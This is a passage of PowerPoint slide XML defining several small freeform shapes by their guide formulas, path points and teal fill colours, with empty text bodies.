              <a:gd name="T3" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T15" fmla="*/ 0 h 124"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T17" fmla="*/ 0 h 124"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T19" fmla="*/ 0 h 124"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T21" fmla="*/ 0 h 124"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T23" fmla="*/ 0 h 124"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T32" fmla="*/ 0 w 31"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T34" fmla="*/ 0 w 31"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 1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1"/>
              <a:gd name="T106" fmla="*/ 0 h 124"/>
              <a:gd name="T107" fmla="*/ 31 w 31"/>
              <a:gd name="T108" fmla="*/ 124 h 1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1" h="124">
                <a:moveTo>
                  <a:pt x="31" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10421" name="Freeform 502"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2752725" y="6373813"/>
            <a:ext cx="61912" cy="233362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 0 h 104"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 0 h 104"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 0 h 104"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 0 h 104"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 0 h 104"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 0 h 104"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 0 h 104"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T32" fmla="*/ 0 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T34" fmla="*/ 0 w 27"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T36" fmla="*/ 0 w 27"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 1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
              <a:gd name="T106" fmla="*/ 0 h 104"/>
              <a:gd name="T107" fmla="*/ 27 w 27"/>
              <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10422" name="Freeform 503"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2755900" y="6375400"/>
            <a:ext cx="49212" cy="188913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T13" fmla="*/ 0 h 84"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T15" fmla="*/ 0 h 84"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T17" fmla="*/ 0 h 84"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T19" fmla="*/ 0 h 84"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T21" fmla="*/ 0 h 84"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T23" fmla="*/ 0 h 84"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T25" fmla="*/ 0 h 84"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T32" fmla="*/ 0 w 22"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T34" fmla="*/ 0 w 22"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T36" fmla="*/ 0 w 22"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T38" fmla="*/ 0 w 22"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T69" fmla="*/ 2147483647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
              <a:gd name="T106" fmla="*/ 0 h 84"/>
              <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                <a:moveTo>
                  <a:pt x="22" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10423" name="Freeform 504"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757487" y="6376988"/>
            <a:ext cx="41275" cy="149225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T7" fmla="*/ 0 h 66"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T9" fmla="*/ 0 h 66"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T11" fmla="*/ 0 h 66"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T13" fmla="*/ 0 h 66"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T16" fmla="*/ 0 w 18"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T18" fmla="*/ 0 w 18"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T20" fmla="*/ 0 w 18"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 66"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 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
              <a:gd name="T58" fmla="*/ 0 h 66"/>
              <a:gd name="T59" fmla="*/ 18 w 18"/>
              <a:gd name="T60" fmla="*/ 66 h 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 h="66">
                <a:moveTo>
                  <a:pt x="18" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10424" name="Freeform 505"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757487" y="6381750"/>
            <a:ext cx="31750" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 0 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 0 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 0 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 0 h 45"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 0 h 45"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 0 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 0 h 45"/>
              <a:gd name="T16" fmla="*/ 0 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 0 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
